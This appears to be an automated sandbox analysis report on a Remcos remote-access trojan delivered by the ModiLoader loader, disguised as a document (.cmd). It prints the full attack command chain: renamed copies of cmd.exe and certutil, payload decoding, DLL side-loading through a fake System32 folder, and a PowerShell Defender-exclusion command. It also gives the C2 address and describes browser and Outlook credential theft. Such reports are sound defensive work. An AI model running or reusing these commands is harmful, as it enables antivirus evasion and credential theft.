Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-uk
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-uklocale:uk-uaos:windows10-2004-x64systemwindows
  • submitted
    13-04-2024 22:01

General

  • Target

    Our Ref - 653273-KAC,doc .cmd

  • Size

    3.2MB

  • MD5

    f297a617009597680e4c5761b5528e2b

  • SHA1

    18bbfb2e7be3cf815cbb131985d8370aae1f11d8

  • SHA256

    63a16a4395c1ffbd9b459e0913a3c4d1358816fdf207ab642b811c9551a9a41e

  • SHA512

    f6970e843068c0c8154b7baba2cd4139a91092e004eb09c2ca96d6cd9146fe4fd39be0d12b7446a6c3d9421e53e69a78918418e0706869b78d3f3ea3126b09ae

  • SSDEEP

    49152:Rz2itfXve4rdS832GjhZqBaN6y3LZboHHTAJ:N

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

showlove24.duckdns.org:2500

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-2EZOQ2

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • ModiLoader Second Stage 1 IoCs
  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 6 IoCs
  • Executes dropped EXE 12 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Our Ref - 653273-KAC,doc .cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3372
    • C:\Windows\System32\extrac32.exe
      C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
        PID:1104
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:740
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          3⤵
            PID:1668
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Our Ref - 653273-KAC,doc .cmd" "C:\\Users\\Public\\Yano.txt" 9
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4432
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Our Ref - 653273-KAC,doc .cmd" "C:\\Users\\Public\\Yano.txt" 9
            3⤵
            • Executes dropped EXE
            PID:656
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:696
          • C:\Users\Public\kn.exe
            C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Yano.txt" "C:\\Users\\Public\\Libraries\\Yano.com" 12
            3⤵
            • Executes dropped EXE
            PID:2508
        • C:\Users\Public\Libraries\Yano.com
          C:\Users\Public\Libraries\Yano.com
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:3996
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\NgiwppbnO.bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3196
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
              4⤵
                PID:1964
              • C:\Windows\SysWOW64\xcopy.exe
                xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                4⤵
                • Enumerates system info in registry
                PID:856
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                4⤵
                  PID:2444
                • C:\Windows\SysWOW64\xcopy.exe
                  xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
                  4⤵
                  • Enumerates system info in registry
                  PID:4816
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                  4⤵
                    PID:4564
                  • C:\Windows\SysWOW64\xcopy.exe
                    xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                    4⤵
                    • Enumerates system info in registry
                    PID:1452
                  • C:\Windows \System32\easinvoker.exe
                    "C:\Windows \System32\easinvoker.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:4348
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\windows \system32\aaa.bat""
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1952
                      • C:\Windows\system32\cmd.exe
                        cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1468
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                          7⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4468
                • C:\Windows\SysWOW64\extrac32.exe
                  C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Yano.com C:\\Users\\Public\\Libraries\\Ngiwppbn.PIF
                  3⤵
                    PID:3384
                  • C:\Users\Public\Libraries\Yano.com
                    C:\Users\Public\Libraries\Yano.com /stext "C:\Users\Admin\AppData\Local\Temp\rzdkvqnoxgmqoqbrrmegrhsqef"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2380
                  • C:\Users\Public\Libraries\Yano.com
                    C:\Users\Public\Libraries\Yano.com /stext "C:\Users\Admin\AppData\Local\Temp\utidviyploeuzwpdbxqzumehntpoh"
                    3⤵
                    • Executes dropped EXE
                    • Accesses Microsoft Outlook accounts
                    PID:3284
                  • C:\Users\Public\Libraries\Yano.com
                    C:\Users\Public\Libraries\Yano.com /stext "C:\Users\Admin\AppData\Local\Temp\evwwwbijzwwzbclhshlbfzzqoayxaqzgf"
                    3⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3108
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del "C:\Users\Public\Yano.txt" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:2192
                • C:\Users\Public\alpha.exe
                  C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
                  2⤵
                  • Executes dropped EXE
                  PID:2340

              Network

              MITRE ATT&CK Matrix ATT&CK v13

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Defense Evasion

              Modify Registry

              1
              T1112

              Credential Access

              Unsecured Credentials

              1
              T1552

              Credentials In Files

              1
              T1552.001

              Discovery

              Query Registry

              1
              T1012

              System Information Discovery

              1
              T1082

              Collection

              Data from Local System

              1
              T1005

              Email Collection

              1
              T1114

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zzmozy3d.fqi.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Users\Admin\AppData\Local\Temp\rzdkvqnoxgmqoqbrrmegrhsqef
                Filesize

                4KB

                MD5

                3c96c237f999804a4b9a1e4efc47ee32

                SHA1

                d04ca178169b67c713aa8e39172ba3f8d3d3593f

                SHA256

                3701d62d6d9983c7e9ea659410bd35c33f99fda276c7d8808a5ebd6e8884a7b8

                SHA512

                a1f84e81de371ece583920ec922d3ae6982e030b0a381b1d0642516fd79fadcee1d5315f72611361b92ebef5c73ffd6dcfc24de282def93d416ad74df816a6b9

              • C:\Users\Public\Libraries\NgiwppbnO.bat
                Filesize

                29KB

                MD5

                828ffbf60677999579dafe4bf3919c63

                SHA1

                a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc

                SHA256

                abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d

                SHA512

                bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e

              • C:\Users\Public\Libraries\Yano.com
                Filesize

                1.2MB

                MD5

                3147ba694f2ec3ec854dedd232bb0929

                SHA1

                ed91a0da43fe608ef74783b7a0f44c52652d2a01

                SHA256

                56885ee5ea8c61dd83cdb3433c0e17f3573002a42b2f113b750db32d67205ba6

                SHA512

                1407017c08a8679975d0abd19448160be846b8eba8c9395361c82434f46e7426ded3e053cda7fb8a111828f1cbd4a99d74daff017b9c7677928c045d8471bd3a

              • C:\Users\Public\Libraries\aaa.bat
                Filesize

                18KB

                MD5

                f4e8f0ec6cfc5c6039402322685cb6ce

                SHA1

                1037835573c2886dda05d256f15306da89dc645e

                SHA256

                cd05094e213643d624996b98e14aa5f7a2363f63530fe0c99523f6948effe756

                SHA512

                c5f9dfbbdb437c8ef9e2dd53fcbafcb256ab4626b4637a21332b3112c20f0d5353674031aae21b57604ba80d3b3f51f11b0ed412ed5fa6641b32fc4793746e02

              • C:\Users\Public\Libraries\easinvoker.exe
                Filesize

                128KB

                MD5

                231ce1e1d7d98b44371ffff407d68b59

                SHA1

                25510d0f6353dbf0c9f72fc880de7585e34b28ff

                SHA256

                30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

                SHA512

                520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

              • C:\Users\Public\Libraries\netutils.dll
                Filesize

                112KB

                MD5

                30468939b69d5b1f29494fff5b161e6b

                SHA1

                3f900a76e5a00efd97c618c8cdaa55e66384618f

                SHA256

                7c6b2128913876dcb70603f2c00618d2e9057f381766565baf2a37100b85f1fd

                SHA512

                f59fc26b77b28bc0dce41f2542c95a0fcb32204cc2d840d7cf8e74e10fbfc238f0c360e3bb5d787f32c83668ad10bbe522e098ede52f178dd8555c7af530f27f

              • C:\Users\Public\Yano.txt
                Filesize

                2.3MB

                MD5

                dad7f7aa4241805fc652b75e2e908e83

                SHA1

                0441523013c1972ee53ca2b2cf079073fff9f1c2

                SHA256

                1d4712bab765dd8dbf8e43194961a02945d99f78424883a5a701e63fb4bf7ce8

                SHA512

                6b6a6b6590378a79acc28070ca4aa8a1a261949243e656ecf821e677523424f7da2f13603456d29bf8f1d0e69b7b2df2792a7b99135fe4ebf0c09c82b93e1d2f

              • C:\Users\Public\alpha.exe
                Filesize

                283KB

                MD5

                8a2122e8162dbef04694b9c3e0b6cdee

                SHA1

                f1efb0fddc156e4c61c5f78a54700e4e7984d55d

                SHA256

                b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

                SHA512

                99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

              • C:\Users\Public\kn.exe
                Filesize

                1.6MB

                MD5

                bd8d9943a9b1def98eb83e0fa48796c2

                SHA1

                70e89852f023ab7cde0173eda1208dbb580f1e4f

                SHA256

                8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

                SHA512

                95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

              • memory/2380-94-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

              • memory/2380-86-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

              • memory/2380-102-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

              • memory/2380-112-0x0000000000400000-0x0000000000478000-memory.dmp
                Filesize

                480KB

              • memory/3108-99-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

              • memory/3108-110-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

              • memory/3108-105-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

              • memory/3108-92-0x0000000000400000-0x0000000000424000-memory.dmp
                Filesize

                144KB

              • memory/3284-100-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

              • memory/3284-98-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

              • memory/3284-93-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

              • memory/3284-88-0x0000000000400000-0x0000000000462000-memory.dmp
                Filesize

                392KB

              • memory/3996-119-0x000000002D4C0000-0x000000002D4D9000-memory.dmp
                Filesize

                100KB

              • memory/3996-123-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-80-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-81-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-83-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-85-0x0000000002430000-0x0000000002431000-memory.dmp
                Filesize

                4KB

              • memory/3996-78-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-77-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-76-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-143-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-142-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-138-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-137-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-133-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-132-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-52-0x0000000000400000-0x0000000000531000-memory.dmp
                Filesize

                1.2MB

              • memory/3996-128-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-30-0x0000000002900000-0x0000000003900000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-29-0x0000000002900000-0x0000000003900000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-115-0x000000002D4C0000-0x000000002D4D9000-memory.dmp
                Filesize

                100KB

              • memory/3996-28-0x0000000002430000-0x0000000002431000-memory.dmp
                Filesize

                4KB

              • memory/3996-118-0x000000002D4C0000-0x000000002D4D9000-memory.dmp
                Filesize

                100KB

              • memory/3996-120-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-121-0x000000002D4C0000-0x000000002D4D9000-memory.dmp
                Filesize

                100KB

              • memory/3996-122-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-79-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/3996-127-0x00000000153E0000-0x00000000163E0000-memory.dmp
                Filesize

                16.0MB

              • memory/4348-51-0x00000000613C0000-0x00000000613E3000-memory.dmp
                Filesize

                140KB

              • memory/4468-59-0x000001A5C00C0000-0x000001A5C00E2000-memory.dmp
                Filesize

                136KB

              • memory/4468-64-0x00007FFA46470000-0x00007FFA46F31000-memory.dmp
                Filesize

                10.8MB

              • memory/4468-65-0x000001A5C0080000-0x000001A5C0090000-memory.dmp
                Filesize

                64KB

              • memory/4468-66-0x000001A5C0080000-0x000001A5C0090000-memory.dmp
                Filesize

                64KB

              • memory/4468-69-0x000001A5C02C0000-0x000001A5C042A000-memory.dmp
                Filesize

                1.4MB

              • memory/4468-70-0x00007FFA46470000-0x00007FFA46F31000-memory.dmp
                Filesize

                10.8MB